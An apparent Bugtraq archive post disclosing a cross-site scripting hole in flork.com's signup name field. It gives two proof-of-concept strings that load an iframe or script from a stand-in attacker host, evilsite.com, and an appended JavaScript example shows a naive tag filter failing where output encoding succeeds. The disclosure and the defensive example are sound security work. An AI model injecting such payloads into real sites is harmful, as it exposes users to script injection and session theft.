Bugtraq mailing list archives

Flork.com


From: luny () youfucktard com
Date: 10 Jun 2006 20:49:42 -0000

Flork.com

Affected files:
input boxes when creating a new user

XSS Vulnerability:

We notice by adding empty tags and ending and beginning brackets we can bypass the filter of the flork.com signup.
For PoC try adding either one of the below codes in as your name:

">'>'><iframe src=http://evilsite.com/scriptlet.html <<"<'<'

">'>'><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><'<'
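
Added example, not part of the original post: the two strings above run through a tag-stripping filter and through output encoding, to show why the encoding is the fix for a name field like this one. The filter `stripCompleteTags` and the input-field template are assumptions, since the post does not show flork.com's actual filter or markup.

```javascript
// Added example. PAGE_PAYLOADS are the two strings quoted in the post;
// everything else here is constructed for illustration.
const PAGE_PAYLOADS = [
  `">'>'><iframe src=http://evilsite.com/scriptlet.html <<"<'<'`,
  `">'>'><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><'<'`,
];

// Hypothetical blacklist filter (assumption, not flork.com's code):
// deletes only well-formed <...> tags and leaves everything else alone.
function stripCompleteTags(input) {
  return input.replace(/<[^<>]*>/g, "");
}

// Output encoding for HTML text and quoted attribute values: every
// character that can end an attribute or open a tag becomes an entity.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function encodeForHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Assumed template: the stored name is echoed into a quoted attribute.
const PREFIX = '<input type="text" name="name" value="';
const SUFFIX = '">';
function renderNameField(name, sanitize) {
  return PREFIX + sanitize(name) + SUFFIX;
}

// True when the echoed value still contains a raw quote or angle bracket,
// i.e. it can leave the attribute and be parsed as markup.
function hasRawMarkup(rendered) {
  const value = rendered.slice(PREFIX.length, rendered.length - SUFFIX.length);
  return /[<>"']/.test(value);
}

for (const payload of PAGE_PAYLOADS) {
  const filtered = renderNameField(payload, stripCompleteTags);
  const encoded = renderNameField(payload, encodeForHtml);
  console.log("filtered:", filtered, "raw markup:", hasRawMarkup(filtered));
  console.log("encoded: ", encoded, "raw markup:", hasRawMarkup(encoded));
}
```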

